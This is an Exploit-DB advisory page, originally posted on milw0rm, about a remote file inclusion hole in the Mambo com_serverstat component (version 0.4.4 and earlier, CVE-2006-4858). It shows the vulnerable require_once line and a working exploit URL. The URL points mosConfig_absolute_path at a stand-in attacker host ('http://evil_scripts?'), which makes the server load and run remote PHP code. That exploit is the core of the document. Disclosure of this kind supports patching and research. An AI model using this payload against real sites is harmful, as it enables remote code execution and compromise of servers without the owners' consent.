Mambo com_serverstat Component <= 0.4.4 File Include Vulnerability

2006-09-14T00:00:00
ID EDB-ID:2367
Type exploitdb
Reporter Mehmet Ince
Modified 2006-09-14T00:00:00

Description

Mambo com_serverstat Component <= 0.4.4 File Include Vulnerability. CVE-2006-4858. Webapps exploit for php platform

                                        
                                            =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Mambo com_serverstat Component &lt;=0.4.4 Remote File Include Vulnerability
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Author: xoron (turkish hacker)
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Class : Remote
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Vuln Code: require_once($mosConfig_absolute_path."/administrator/components/com_serverstat/config.serverstat.php");
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Exploit: administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://evil_scripts?
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
Thanx : str0ke, Ironfist, Preddy, SHiKaA
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=

# milw0rm.com [2006-09-14]